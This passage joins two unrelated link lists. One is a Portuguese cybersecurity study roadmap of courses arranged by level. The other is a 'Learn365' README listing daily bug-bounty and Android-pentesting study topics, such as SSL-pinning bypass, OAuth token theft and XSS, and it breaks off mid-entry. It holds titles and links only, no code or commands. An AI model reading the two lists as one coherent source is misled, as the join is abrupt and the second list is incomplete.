Pessoal: https://www.ev.org.br/cursos/organizacao-pessoal ## Iniciado - 25 materiais - Portuguรชs - [ ] EV - Tรฉcnicas de Redaรงรฃo: https://www.ev.org.br/cursos/tecnicas-de-redacao - Processos de TI - [ ] LearnQuest Coursera - ITIL4: https://www.coursera.org/learn/itil-4-exam-preparation - Base de Redes - [ ] Netacad - CCNAv7 Switching, Routing e Wireless Essentials (pelo Nic.Br): https://cursoseventos.nic.br/curso/curso-ccna-srwe-cisco-nicbr/ - Base de Computaรงรฃo - [ ] Princeton University Coursera - Computer Architecture: https://www.coursera.org/learn/comparch - Base de computaรงรฃo em nรบvem - [ ] FIAP - Cloud Fundamentals: https://on.fiap.com.br/local/movimentobrasildigital/ - Seguranรงa da informaรงรฃo geral - [ ] FIAP - Cybersecurity: https://on.fiap.com.br/local/movimentobrasildigital/ - [ ] AacadiTI - Network Defense Essentials: https://acaditi.com.br/essentials-series/#nde - [ ] Coursera - New York University: https://www.coursera.org/specializations/intro-cyber-security - [ ] Cert.br - Recomendaรงรตes para Notificaรงรตes de Incidentes de Seguranรงa: https://www.cert.br/docs/whitepapers/notificacoes/ - [ ] SANS - The Cycle of Cyber Threat Intelligence: https://youtu.be/J7e74QLVxCk - [ ] MITRE - Using ATT&CK for Cyber Threat Intelligence Training: https://attack.mitre.org/resources/training/cti/ - [ ] MITRE - Foundations of Operationalizing MITRE ATT&CK: https://academy.attackiq.com/courses/foundations-of-operationalizing-mitre-attck - Pentest - [ ] DESEC - Introducao Pentest: https://desecsecurity.com/curso/introducao-pentest - Seguranรงa Ofensiva - [ ] AacadiTI - Ethical Hacking Essentials: https://acaditi.com.br/essentials-series/#ehe - [ ] Portswigger Web Security Academy - Server-side topics (93 Labs): https://portswigger.net/web-security/learning-path - Forense computacional - [ ] AcadiTI - Digital Forensics Essentials: https://acaditi.com.br/essentials-series/#dfe - [ ] BASIS - Intro to DFIR: https://dfir-training.basistech.com/courses/intro-to-divide-and-conquer - Exercรญcios de "Capture the Flag" - [ ] Beco do Exploit - Desafio#2: https://youtube.com/playlist?list=PLHBDBcFA_l_WBcUJWf8cp5BaPsUkquRQU - Sistemas Operacionais Linux - [ ] Aurรฉlio - Portal do Shell: https://aurelio.net/shell/ - Sistemas Operacionais Windows - [ ] MSLearn - PowerShell (6 Mรณdulos): https://docs.microsoft.com/en-us/learn/paths/powershell/ - Desenvolvimento de software - [ ] Netacad - JavaScript: https://www.netacad.com/courses/programming/javascript-essentials-1 - Caixa de Ferramentas - [ ] Linux Foundation - Git: https://training.linuxfoundation.org/training/git-for-distributed-software-development-lfd109x/ - Ciรชncia de dados - [ ] Data Science Academy - Microsoft Power BI Para Data Science, Versรฃo 2.0: https://www.datascienceacademy.com.br/cursosgratuitos - Soft Skills - [ ] FIAP - DevOps & Agile Culture: https://on.fiap.com.br/local/movimentobrasildigital/ - [ ] SrgioBuria - XGH Extreme Go Horse (como NรƒO resolver as coisas em TI): https://pt.slideshare.net/SrgioBuria/xgh-extreme-go-horse ## Intermediรกrio - 30 materiais - Base de Redes - [ ] Nic.Br - Curso Bรกsico IPv6: https://cursoseventos.nic.br/curso/curso-basico-ipv6-ead/ - [ ] Netacad - CCNAv7 Enterprise Networking, Security, and Automation (pelo Nic.Br): https://cursoseventos.nic.br/curso/curso-ccna-ensa-cisco-nicbr - Monitoramento de ambientes - [ ] Elastic - Observability Fundamentals: https://www.elastic.co/training/observability-fundamentals - [ ] Elastic - Kibana Fundamentals: https://www.elastic.co/training/kibana-fundamentals - Seguranรงa Ofensiva - [ ] GoHacking - EHC2: https://www.youtube.com/watch?v=bUqu8fh7xUg - [ ] Beco do Exploit - Hacking Dojo: https://becodoexploit.com/HackingDojo/ - [ ] Portswigger Web Security Academy - Client-side topics (93 Labs): https://portswigger.net/web-security/learning-path - [ ] GoHacking - BugBounty: https://youtu.be/UHo9TLzJneM - Seguranรงa Defensiva - [ ] GoHacking - Security Operations 101: https://youtu.be/jHr6o8_sKZo - Sistemas de SIEM - [ ] Jose Bravo - What is a SIEM? (5 Vรญdeos): https://www.youtube.com/watch?v=MtqFMe4zSpQ&list=PLHh9jhztlMyp8lyKXt9orVM57ygW_ihPS - [ ] Cybrary - AlienVault OSSIM: https://www.cybrary.it/course/alienvault-ossim/ - [ ] Elastic - SIEM Fundamentals: https://www.elastic.co/training/elastic-security-fundamentals-siem - Sistemas de Firewall - [ ] Checkpoint edX - Network Security: https://www.edx.org/course/jump-start-network-security - [ ] Checkpoint edX - Product Deployment: https://www.edx.org/course/jump-start-product-deployment - Exercรญcios de "Capture the Flag" - [ ] Over the Wire - Wargames: https://overthewire.org/wargames/ - Desenvolvimento de Software - [ ] Hackaflag Papo Binรกrio - Programaรงรฃo moderna em C: https://hackaflag.com.br/academy.html - Base de engenharia reversa - [ ] Hackaflag Papo Binรกrio - Curso de Engenharia Reversa Online: https://hackaflag.com.br/academy.html - Auditoria de seguranรงa em Sistemas Operacionais - [ ] IPPSec - Linux Logging with Auditd: https://www.youtube.com/watch?v=lc1i9h1GyMA - [ ] Jose Bravo - Sysmon (36 Vรญdeos): https://www.youtube.com/watch?v=Xl31zNp4YUY&list=PLHh9jhztlMyrlWsozcrUEOvByfLJvRBDy - Organizaรงรฃo pessoal e postura - [ ] EV - Comunicacao Empresarial: https://www.ev.org.br/cursos/comunicacao-empresarial - Legislaรงรฃo - [ ] ENAP SERPRO - Lei Brasileira de Proteรงรฃo de Dados Pessoais: https://www.escolavirtual.gov.br/curso/603 - Caixa de Ferramentas - [ ] Linux Foundation - Linux Tools: https://training.linuxfoundation.org/training/linux-tools-for-software-development-lfd108x/ - Introduรงao a eletrรดnica digital - [ ] Georgia Tech Coursera - Introduction to Electronics: https://www.coursera.org/learn/electronics - [ ] Georgia Tech Coursera - Linear Circuits DC: https://www.coursera.org/learn/linear-circuits-dcanalysis - [ ] Georgia Tech Coursera - Linear Circuits AC: https://www.coursera.org/learn/linear-circuits-ac-analysis - [ ] UAB Coursera - Digital Systems: From Logic Gates to Processors: https://www.coursera.org/learn/digital-systems - Soft Skills - [ ] ENAP - Habilidades de Resoluรงรฃo de Problemas: https://www.escolavirtual.gov.br/curso/600 - [ ] Prime Cursos - Noรงรตes basicas de PNL: https://www.primecursos.com.br/nocoes-basicas-de-pnl/ - [ ] Cybrary - Social Engineering: https://www.cybrary.it/course/social-engineering/ - [ ] Sarah Granger - Social Engineering Fundamentals, Part I: Hacker Tactics: http://web.archive.org/web/20160425153636/http://www.symantec.com/connect/articles/social-engineering-fundamentals-part-i-hacker-tactics - [ ] Sarah Granger - Social Engineering Fundamentals, Part II: Combat Strategies: https://web.archive.org/web/20140912061257/http://www.symantec.com/connect/articles/social-engineering-fundamentals-part-ii-combat-strategies ## Praticante - 27 materiais - Exercรญcios de "Capture the Flag" - [ ] Try Hack Me: https://tryhackme.com - [ ] Hack The Box: https://www.hackthebox.eu - Analise de vulnerabilidades - [ ] Rapid7 - Fundamentals Vulnerability Risk Management: https://www.rapid7.com/fundamentals/vulnerabilities-exploits-threats/ - [ ] Tenable - Introduction to Tenable.sc: https://university.tenable.com/pubaccess/learn/course/internal/view/elearning/333/introduction-to-tenablesc - Seguranรงa da informaรงao - [ ] Cert.br - Honeypots e Honeynets: Definiรงรตes e Aplicaรงรตes: https://www.cert.br/docs/whitepapers/honeypots-honeynets/ - Seguranรงa ofensiva em ambientes web - [ ] Stanford - CS253 Web Security: https://web.stanford.edu/class/cs253/ (Vรญdeos das aulas: https://www.youtube.com/playlist?list=PL1y1iaEtjSYiiSGVlL1cHsXN_kvJOOhu-) - [ ] Portswigger Web Security Academy - Advanced topics (93 Labs): https://portswigger.net/web-security/learning-path - Ferramentas para Seguranรงa Ofensiva - [ ] Offensive Security - Metasploit Unleashed: https://www.offensive-security.com/metasploit-unleashed/ - [ ] GoHacking - Fundamentos de Anรกlise de memรณria: https://youtu.be/Iz0Bh7L3iYM - Sistemas de SIEM - [ ] IPPSec - PowerSIEM Analyzing Sysmon Events with PowerShell: https://www.youtube.com/watch?v=MvfhIydxFmw - [ ] Jose Bravo - QRadar (38 Vรญdeos): https://www.youtube.com/watch?v=P90e4iEJ32s&list=PLHh9jhztlMyqRRmj64BcVyNBkhApa_LIn - Tecnologias de internet das coisas - [ ] Netacad - Introduction to IoT: https://www.netacad.com/courses/iot/introduction-iot - Desenvolvimento de software: - [ ] edX - CS50โ€™s Introduction to Programming with Python (CS50P): https://www.edx.org/professional-certificate/harvardx-computer-science-for-python-programming - [ ] Mosh - Learn Node in 1 Hour: https://www.youtube.com/watch?v=TlB_eWDSMt4 - Base de Containers - [ ] LINUXtips Descomplicando o Docker (50 vรญdeos): https://youtube.com/playlist?list=PLf-O3X2-mxDn1VpyU2q3fuI6YYeIWp5rR - Tรฉcnicas de Seguranรงa ofensiva - [ ] Beco do Exploit - The Art of Bypass: https://www.youtube.com/watch?v=f0ErvZeTFVQ - [ ] Beco do Exploit - Contra-inteligรชncia em redes anรดnimas: https://www.youtube.com/watch?v=E4SYtCOYzQM - Base de computaรงรฃo em nรบvem - [ ] Skills Builder - AWS: https://explore.skillbuilder.aws/learn/course/external/view/elearning/134/aws-cloud-practitioner-essentials - [ ] Coursera Google - GCP: https://www.coursera.org/learn/gcp-fundamentals - [ ] Oracle Academy - OCI: https://mylearn.oracle.com/learning-path/become-an-oci-foundations-associate/98057 - MSLearn - Azure Fundamentals (6 Learning Paths): - [ ] https://docs.microsoft.com/pt-br/learn/paths/az-900-describe-cloud-concepts/ - [ ] https://docs.microsoft.com/pt-br/learn/paths/az-900-describe-core-azure-services/ - [ ] https://docs.microsoft.com/pt-br/learn/paths/az-900-describe-core-solutions-management-tools-azure/ - [ ] https://docs.microsoft.com/pt-br/learn/paths/az-900-describe-general-security-network-security-features/ - [ ] https://docs.microsoft.com/pt-br/learn/paths/az-900-describe-identity-governance-privacy-compliance-features/ - [ ] https://docs.microsoft.com/pt-br/learn/paths/az-900-describe-azure-cost-management-service-level-agreements/ - Soft Skills - [ ] FM2S - Introduรงรฃo ao Lean: https://ead.fm2s.com.br/curso/introducao-ao-lean/ ## Fluente - 17 materiais - Tecnologias de internet das coisas - [ ] UCI Coursera - Introduction to Programming the Internet of Things (4 Cursos): https://www.coursera.org/specializations/iot - Sistemas de firewall - [ ] Network Direction - Palo Alto Firewalls (8 Vรญdeos): https://www.youtube.com/playlist?list=PLDQaRcbiSnqFM4qcMEskn2k48LsUGKFga - [ ] Network Direction - CISCO ASA Firewalls (8 Vรญdeos): https://www.youtube.com/playlist?list=PLDQaRcbiSnqHXo_r1scHZook0BAED5-YN - Ferramentas para Pentest - [ ] Ryan Basden - Pentesting Team Tools (Twitter Thread): https://twitter.com/_rybaz/status/1544661984666427394?t=gjK3lCt_siNz8SUO-zNhcg&s=19 - Sistemas de SIEM - Splunk - [ ] Praveen - Splunk for beginners: https://youtu.be/lIQJMjSlY8U - Gestรฃo de seguranรงa da informaรงรฃo - [ ] Cert.br - Criando um Grupo de Respostas a Incidentes de Seguranรงa em Computadores: Um Processo para Iniciar a Implantaรงรฃo: https://www.cert.br/certcc/csirts/Creating-A-CSIRT-br.html - Desenvolvimento de software - [ ] GoHacking - Desenvolvimento seguro e DevSecOps: https://youtu.be/oZc0SNpdOaI - [ ] Miguel Grinberg - Flask Mega Tutorial: https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world - [ ] Oracle Academy - Java Explorer: https://learn.oracle.com/ols/learning-path/java-explorer/40805/79726 - [ ] Cybrary - Secure Coding: https://www.cybrary.it/course/secure-coding/ ## Avanรงado - 7 materiais - Seguranรงa Ofensiva - [ ] GoHacking - Atividades de pรณs exploracao: https://youtu.be/vCk3sAVRJSM - [ ] GoHacking - Configurando Ambiente de Pentest em dispositivos mรณveis: https://youtu.be/n72AKrFBlj8 - Compartilhamento de informaรงรตes - [ ] FIRST - MISP General Usage Training - Part 1 of 2: https://www.youtube.com/watch?v=-NuODyh1YJE - [ ] FIRST - MISP General Usage Training - Part 2 of 2: https://www.youtube.com/watch?v=LlKnh5b0bgw - Tecnologias de rede - [ ] Juniper - CCNA to JNCIA-Junos: https://learningportal.juniper.net/juniper/user_activity_info.aspx?id=EDU-JUN-WBT-JOL-CCNA-JNCIA-JUNOS - [ ] Juniper - Security, Associate (JNCIA-SEC): https://learningportal.juniper.net/juniper/user_activity_info.aspx?id=EDU-JUN-WBT-JOL-JNCIA-SEC - [ ] Network Direction - Voice Networks (VoIP): https://www.youtube.com/playlist?list=PLDQaRcbiSnqG0b2hevMJlEx62o8RnC41l - Sistemas de SIEM - ArcSight (2 sรฉries/paylists de vรญdeos) - [ ] Paul Brettle - What is Series: https://youtube.com/playlist?list=PL_JhopV-r9zLigctFEOzic-af0sEuHZ-x - [ ] Paul Brettle - ArcSight ESM 101: https://youtube.com/playlist?list=PL_JhopV-r9zIXDz0pX2dmSJvBGVkczF5y ## Mestre - 6 materiais - Threat Hunting - [ ] Active Countermeasures - Cyber Threat Hunting Level 1: https://www.youtube.com/watch?v=UEOqTu8cJt0 - Analise de redes - [ ] CERT NetSA - Network Traffic Analysis with SiLK: https://tools.netsa.cert.org/silk/analysis-handbook.pdf - Analise de malware - [ ] CERT.pl - Build Your Own Malware Analysis Pipeline Using New Open Source Tools: https://www.youtube.com/watch?v=dPwzF_hsCow - Tecnologias de plataforma industrial - [ ] CISA VLP - 210W-03 Common ICS Components: https://ics-training.inl.gov/learn/course/internal/view/elearning/60/210w-03-common-ics-components - [ ] CISA VLP - 210W-02 Influence of IT Components on Industrial Control Systems: https://ics-training.inl.gov/learn/course/internal/view/elearning/47/210w-02-influence-of-it-components-on-industrial-control-systems - [ ] CISA VLP - 100W Cybersecurity Practices for Industrial Control Systems: https://ics-training.inl.gov/learn/course/internal/view/elearning/45/100w-cybersecurity-practices-for-industrial-control-systems - Tecnologias de plataforma alta (Mainframe) - [ ] IBM Z Enterprise Computing Kickstart: https://www.ibm.com/academic/topic/ibm-z - [ ] Introduction to the Mainframe: https://www.ibm.com/academic/topic/ibm-z ## "Hero" - 7 materiais - Tecnologias de plataforma industrial - [ ] CISA VLP - 210W-04 Cybersecurity Within IT and ICS Domains (FY21): https://ics-training.inl.gov/learn/course/internal/view/elearning/162/210w-04-cybersecurity-within-it-and-ics-domains-fy21 - [ ] CISA VLP - 210W-10 Mapping IT Defense-In-Depth Security Solutions to ICS - Part I: https://ics-training.inl.gov/learn/course/internal/view/elearning/51/210w-10-mapping-it-defense-in-depth-security-solutions-to-ics-part-i - [ ] CISA VLP - 210W-11 Mapping IT Defense-In_Depth Security Solutions to ICS - Part II: https://ics-training.inl.gov/learn/course/internal/view/elearning/52/210w-11-mapping-it-defense-indepth-security-solutions-to-ics-part-ii - [ ] CISA VLP - 210W-09 Attack Methodologies in IT & ICS: https://ics-training.inl.gov/learn/course/internal/view/elearning/58/210w-09-attack-methodologies-in-it-ics - Tecnologias de plataforma alta (Mainframe) - [ ] z/OS Introduction: https://www.ibm.com/academic/topic/ibm-z - [ ] Introduction to the Cobol Language: https://www.ibm.com/academic/topic/ibm-z - [ ] Linux on IBM Z: https://www.ibm.com/academic/topic/ibm-z
# Learn365 This repository contains all the information shared during my Learn 365 Challenge. Learn 365 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for the whole year, it can be anything from infosec to general life. Follow me on Twitter for Regular Updates: [Anubhav Singh](https://twitter.com/AnubhavSingh_). Huge thanks to [Harsh Bothra](https://twitter.com/harshbothra_), from whoam I got motivated to start this Learn365 challenge. ------- Day | Topic --- | --- **1** | [<ul><li>Learn Javascript </li><li> The Tool Box karma v2 and 4-ZERO-3 - Talk </li><li> Finding and exploiting unintended functionality in main web app APIs - Writeup </li><li> Workflow for Javascript Recon</li></ul>](/days/day1.md) **2** | [<ul><li>Learn Javascript </li><li> Read BugBounty BootCamp - Book </li><li> Learn Python</li></ul>](/days/day2.md) **3** | [<ul><li>Learn Javascript </li><li> AWS Lambda Command Injection - Writeup </li><li> A tale of zero click account takeover - Writeup</li></ul>](/days/day3.md) **4** | [<ul><li>Learn CSS </li><li> Learn Python</li></ul>](/days/day4.md) **5** | [<ul><li>Learn Javascript [Revision]</li></ul>](/days/day5.md) **6** | [<ul><li>Solved DOM based XSS Labs on Portswigger </li></ul>](/days/day6.md) **7** | [<ul><li>Solved DOM based XSS Labs on Portswigger </li><li> Learn Python</li></ul>](/days/day7.md) **8** | [<ul><li>A Cool Account Takeover Vulnerability due to lack of Client Side Validation - WriteUp </li></ul>](/days/day8.md) **9** | [<ul><li>WebSockets not Bound by SOP and CORS? - WriteUp </li></ul>](/days/day9.md) **10** | [<ul><li>Unauth Cache Purging - WriteUp </li><li> How I was able to change victimโ€™s password using IDN Homograph Attack - WriteUp</li></ul>](/days/day10.md) **11** | [<ul><li>Controlling the web message source - Lab </li><li> JavaScript for Hackers - Video </li><li> HACKING postMessage() - Video </li><li> Introduction postmessage vulnerabilities - Writeup </li><li> Postmessage vulnerability demo -Lab</li></ul>](/days/day11.md) **12** | [<ul><li> A simple Data Exfiltration! Excel magic - Writeup</li></ul>](/days/day12.md) **13** | [<ul><li> One Token to leak them all : The story of a $8000 NPM_TOKEN - Writeup </li><li> Introduction to GraphQL - GraphQL Exploitation Part1 - Video</li></ul>](/days/day13.md) **14** | [<ul><li>Finding The Origin IP Behind CDNs - Writeup</li></ul>](/days/day14.md) **15** | [<ul><li>Hunting postMessage Vulnerabilities - White Paper</li></ul>](/days/day15.md) **16** | [<ul><li>120 Days of High Frequency Hunting - WriteUp </li><li> Hunting postMessage Vulnerabilities - White Paper</li></ul>](/days/day16.md) **17** | [<ul><li>How to find new/more domains of a company? - Recon Stuff - Writeup</li></ul>](/days/day17.md) **18** | [<ul><li>Read BugBounty BootCamp - Book</li></ul>](/days/day18.md) **19** | [<ul><li>The Tale of a Click leading to RCE - Writeup</li></ul>](/days/day19.md) **20** | [<ul><li>PostMessage Vulnerabilities - WriteUp</li></ul>](/days/day20.md) **21** | [<ul><li>DVGA - Damn Vulnerable GraphQL Application Part 2 - Video</li></ul>](/days/day21.md) **22** | [<ul><li>Chrome DevTools Crash Course - Video</li></ul>](/days/day22.md) **23** | [<ul><li>Crontab for Linux Admins - Video</li></ul>](/days/day23.md) **24** | [<ul><li>Template Injection in Action: 2-hour workshop on Template Injection (SSTI) </li><li> Read BugBounty BootCamp - Book</li></ul>](/days/day24.md) **25** | [<ul><li>Hacking REST APIs: A beginner's guide - Course</li></ul>](/days/day25.md) **26** | [<ul><li>Read BugBounty BootCamp - Book </li><li> Read zseano's methodology - Book</li></ul>](/days/day26.md) **27** | [<ul><li>Read zseano's methodology - Book</li></ul>](/days/day27.md) **28** | [<ul><li>Read zseano's methodology - Book </li><li> Params โ€” Discovering Hidden Treasure in WebApps - Writeup</li></ul>](/days/day28.md) **29** | [<ul><li>WebSockets and Hacking - Writeup</li></ul>](/days/day29.md) **30** | [<ul><li>Pentesting API Top 10 - Talk</li></ul>](/days/day30.md) **31** | [<ul><li>Read BugBounty BootCamp - Book </li><li> Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite - Writeup</li></ul>](/days/day31.md) **32** | [<ul><li>Android: Quick History on Smartphones - Video </li><li> Intro to App Development - Video </li><li> Top 25 Browser Extensions for Pentesters and Bugbounty Hunters (2022) - Writeup</li></ul>](/days/day32.md) **33** | [<ul><li> Intro to Android Architecture and Security - Video </li><li> What is an Android Operating System & Its Features - Writeup </li><li> Android Internals 101: How Android OS Starts You Application - Writeup </li><li> Android Security Part 1- Understanding Android Basics - Writeup</li></ul>](/days/day33.md) **34** | [<ul><li>Mobile Application Penetration Testing - TCM Course</li></ul>](/days/day34.md) **35** | [<ul><li>Read BugBounty BootCamp - Book</li></ul>](/days/day35.md) **36** | [<ul><li> Solved 1-10 Challenges of InjuredAndroid </li><li> Recon methodology of @GodfatherOrwa - Video</li></ul>](/days/day36.md) **37** | [<ul><li>Read BugBounty BootCamp - Book</li></ul>](/days/day37.md) **38** | [<ul><li>1,2 Exercises: Android App Reverse Engineering 101</li></ul>](/days/day38.md) **39** | [<ul><li>3,4 Exercises: Android App Reverse Engineering 101</li></ul>](/days/day39.md) **40** | [<ul><li>Android App Reverse Engineering LIVE! Part 1 - Workshop </li></ul>](/days/day40.md) **41** | [<ul><li>Android Architecture + Static Analysis with apktool + gf + jadx </li><li> Insecure Logging & Storage + Setup Genymotion & pidcat </li></ul>](/days/day41.md) **42** | [<ul><li>Troubleshooting connection between WSL and android emulator </li></ul>](/days/day42.md) **43** | [<ul><li>Mobexler : A Mobile Application Penetration Testing Platform - Video </li></ul>](/days/day43.md) **44** | [<ul><li>Android Pentesting Lab Setup - Writeup </li></ul>](/days/day44.md) **45** | [<ul><li>Hacking Android Deeplink Issues and Insecure URL Validation - Video </li></ul>](/days/day45.md) **46** | [<ul><li>SINGLE-SIGN-ON SECURITY ISSUES : BugBounty BootCamp - Book </li></ul>](/days/day46.md) **47** | [<ul><li>Solved Flag 12 & 13 of Injured Android</li></ul>](/days/day47.md) **48** | [<ul><li> Android SSL Pinning Bypass for Bug Bounties & Penetration Testing - Video </li><li> SSL Pinning in Android Part 1 - Writeup </li><li> SSL Pinning in Android Part 2 - Writeup </li><li> What is Android Rooting? - Writeup </li><li> Four Ways to Bypass Android SSL Verification and Certificate Pinning - Writeup</li></ul>](/days/day48.md) **49** | [<ul><li> Bypassing OkHttp Certificate Pinning - Writeup </li><li> Disabling SSL Pinning in Android Apps using Frida / Objection - Writeup </li><li> How To Bypass Apps Root Detection In Android - Writeup </li><li> Bug Bounty on Android : setup your Genymotion environment for APK analysis - Writeup</li></ul>](/days/day49.md) **50** | [<ul><li> The Ultimate Guide to Android SSL Pinning Bypass - Guide </li></ul>](/days/day50.md) **51** | [<ul><li> OAuth terminologies and flows explained - Video </li><li> OAuth 2.0 Hacking Simplified โ€” Part 1 โ€” Understanding Basics - Writeup </li><li> OAuth 2.0 Hacking Simplified โ€” Part 2 โ€” Vulnerabilities and Mitigation - Writeup </li></ul>](/days/day51.md) **52** | [<ul><li> Bug Bounty โ€” Bypassing Endpoints - Writeup </li></ul>](/days/day52.md) **53** | [<ul><li> How I made 25000 USD in bug bounties with reverse proxy - Writeup </li></ul>](/days/day53.md) **54** | [<ul><li> Intercepting Android Emulator SSL traffic with burp using magisk - Writeup </li></ul>](/days/day54.md) **55** | [<ul><li> Subdomains Tools Review: a full and detailed comparison of subdomain enumeration tools - Writeup </li></ul>](/days/day55.md) **56** | [<ul><li>Lab: Authentication bypass via OAuth implicit flow </li></ul>](/days/day56.md) **57** | [<ul><li>Web Authentication and Authorization Zine - Zine </li></ul>](/days/day57.md) **58** | [<ul><li>Forced OAuth profile linking - Lab </li><li> OAuth account hijacking via redirect_uri - Lab</li><li> Stealing OAuth access tokens via an open redirect - Lab</li></ul>](/days/day58.md) **59** | [<ul><li>ANDROID APP SECURITY BASICS (Static analysis - Part 1) - Video </li></ul>](/days/day59.md) **60** | [<ul><li>HACKING ANDROID WebViews (Static analysis - Part 2) - Video </li><li> Getting Started with Android Application Security - Writeup </li><li>Android Pentest: Automated Analysis using MobSF - Writeup</li><li>Static Analysis of Android Application & Tools Used - Writeup</li><li>Complete Android Pentesting Guide - Writeup </li></ul>](/days/day60.md) **61** | [<ul><li>Android App Security & Testing - Writeup</li><li> Exploiting Android activity android:exported="true" - Writeup </li><li> Exploiting Activity in medium android app - Writeup </li></ul>](/days/day61.md) **62** | [<ul><li> Android Penetration Testing: Drozer - Writeup</li></ul>](/days/day62.md) **63** | [<ul><li> Android Pentest: Deep Link Exploitation - Writeup</li></ul>](/days/day63.md) **64** | [<ul><li> Android Applications Pentesting (Static Analysis) - HackTricks</li></ul>](/days/day64.md) **65** | [<ul><li> OAuth Sign Up AND Log In (1-6 Slides) - Slides</li></ul>](/days/day65.md) **66** | [<ul><li> Authentication bypass due to weak verification of SAML Token - Writeup</li></ul>](/days/day66.md) **67** | [<ul><li>Bypassing Google Authentication on Periscope's Administration Panel - Writeup</li></ul>](/days/day67.md) **68** | [<ul><li> Burp Bounty v2 Documentation </li><li> Architect: Major Design Decisions - OAuth </li><li> Classic Web Application: Authorization Code Grant Flow - OAuth</li></ul>](/days/day68.md) **69** | [<ul><li>Authorizationcode_tester - Tester: Exploit Mistakes</li></ul>](/days/day69.md) **70** | [<ul><li>Pwning a Server using Markdown - Writeup</li></ul>](/days/day70.md) **71** | [<ul><li>Critical XSS in chrome extension - Writeup</li></ul>](/days/day71.md) **72** | [<ul><li>Penetrate the Protected Component in Android Part 1 - Writeup</li></ul>](/days/day72.md) **73** | [<ul><li>Penetrate the Protected Component in Android Part 2 - Writeup</li></ul>](/days/day73.md) **74** | [<ul><li>From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password - Writeup</li></ul>](/days/day74.md) **75** | [<ul><li>How Tapjacking Made a Return with Android Marshmallow and Nobody Noticed - Writeup</li></ul>](/days/day75.md) **76** | [<ul><li>How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public Program? - Writeup</li></ul>](/days/day76.md) **77** | [<ul><li>Android Development (1:45 Hrs) - Video</li></ul>](/days/day77.md) **78** | [<ul><li>Android Development: Java Refresher - Video</li></ul>](/days/day78.md) **79** | [<ul><li>Android Development: Activities & Layouts - Video</li></ul>](/days/day79.md) **80** | [<ul><li>Android Development: MultiScreen Apps - Video</li></ul>](/days/day80.md) **81** | [<ul><li>How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes - Writeup</li></ul>](/days/day81.md) **82** | [<ul><li>From XSS to RCE (dompdf 0day) - Writeup</li></ul>](/days/day82.md) **83** | [<ul><li>A Detailed Guide on httpx - Writeup</li></ul>](/days/day83.md) **84** | [<ul><li>Chapter 24 API Hacking : BugBounty BootCamp - Book</li></ul>](/days/day84.md) **85** | [<ul><li>Preparing for API Security Testing : Hacking APIs - Book</li></ul>](/days/day85.md) **86** | [<ul><li>How web applications work : Hacking APIs - Book</li></ul>](/days/day86.md) **87 - 90** | [<ul><li>The Anatomy of Web APIs : Hacking APIs - Book</li></ul>](/days/day87.md) **91** | [<ul><li>DIVA Android App: Walkthrough - Writeup</li></ul>](/days/day91.md) **92** | [<ul><li>The Anatomy of Web APIs : Hacking APIs - Book</li></ul>](/days/day92.md) **93** | [<ul><li>Android Penetration Testing: Frida - Writeup</li></ul>](/days/day93.md) **94** | [<ul><li>Diva apk analysis - Writeup</li></ul>](/days/day94.md) **95** | [<ul><li>API Authentication: Hacking APIs - Book</li></ul>](/days/day95.md) **96** | [<ul><li>Watch out the links : Account takeover! - Writeup</li></ul>](/days/day96.md) **97** | [<ul><li> 10 things you must do when Pentesting Android Applications - Writeup </li><li> Dumping Android application memory with fridump - Writeup </li><li> Mobile Risks: M1 โ€“ Improper platform usage - Writeup</li><li> Mobile Risks: M2 โ€“ Insecure data storage - Writeup</li><li> Mobile Risks: M3 โ€“ Insecure communication - Writeup </li><li> Understanding the OWASP Mobile Top 10 Security Risks: Part Two (M4-M7) - Writeup </li><li> Understanding the OWASP Mobile Top 10 Security Risks: Part Three (M8-M10) - Writeup </li></ul>](/days/day97.md) **98** | [<ul><li>Vulnerable Android Broadcast Receivers - Writeup</li></ul>](/days/day98.md) **99** | [<ul><li>API Insecurities Hacking APIs - Book</li></ul>](/days/day99.md) **100** | [<ul><li>How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty - Writeup</li></ul>](/days/day100.md) **101** | [<ul><li>Open Android Security Assessment Methodology - Repo</li></ul>](/days/day101.md) **102** | [<ul><li>API Insecurities Hacking APIs (page 72 - 81) - Book</li></ul>](/days/day102.md) **103** | [<ul><li>API Insecurities Hacking APIs (page 84 - 96) - Book</li></ul>](/days/day103.md) **104** | [<ul><li>How I made $10K in bug bounties from GitHub secret leaks - Writeup</li></ul>](/days/day104.md) **105** | [<ul><li>Android: How to Bypass Root Check and Certificate Pinning - Writeup </li><li> Comparison of Different Android Root-Detection Bypass Tools - Writeup </li></ul>](/days/day105.md) **106** | [<ul><li>Bypassing a WAF by Finding the Origin IP - Video</li></ul>](/days/day106.md) **107** | [<ul><li>Inspecting Android Traffic using Proxyman + apk-mitm - Writeup</li></ul>](/days/day107.md) **108** | [<ul><li>NoSQL Injection in Plain Sight - Writeup</li></ul>](/days/day108.md) **109** | [<ul><li>Configuring an out-of-band callback listener and notification service in under 10 minutes using AWS Lambda function URLs and Discord webhooks - Writeup</li></ul>](/days/day109.md) **110** | [<ul><li>Supplemental Tools : Hacking APIs - Book</li></ul>](/days/day110.md) **111** | [<ul><li>Android Root Detection Bypass Using Objection and Frida Scripts - Writeup</li></ul>](/days/day111.md) **112** | [<ul><li>Configuring Frida with BurpSuite and Genymotion to bypass Android SSL Pinning - Writeup</li></ul>](/days/day112.md) **113** | [<ul><li>Find new domains of a company using SSL Certificates - Bug Bounty Recon - Writeup</li></ul>](/days/day113.md) **114** | [<ul><li>Exploiting Android Fingerprint Authentication - Writeup</li></ul>](/days/day114.md) **115** | [<ul><li>Testing-Local-Authentication - Owasp Guide </li></ul>](/days/day115.md) **116** | [<ul><li>Bypass of Biometrics & Password Security Functionality For android - Writeup </li></ul>](/days/day116.md) **117** | [<ul><li>Creating Code for Bypassing Android Security Checks: Frida - Video </li></ul>](/days/day117.md) **118** | [<ul><li>Sharpening your FRIDA scripting skills with Frida Tool - Writeup </li></ul>](/days/day118.md) **119** | [<ul><li>Hacking Android Apps with Frida - Video </li></ul>](/days/day119.md) **120** | [<ul><li>ATO without any interaction : aws cognito misconfiguration - Writeup </li></ul>](/days/day120.md) **121** | [<ul><li>NahamCon CTF 2022 Write-up: Click Me! Android challenge - Writeup </li></ul>](/days/day121.md) **122** | [<ul><li>Android Application Security [chapter 0x1] - 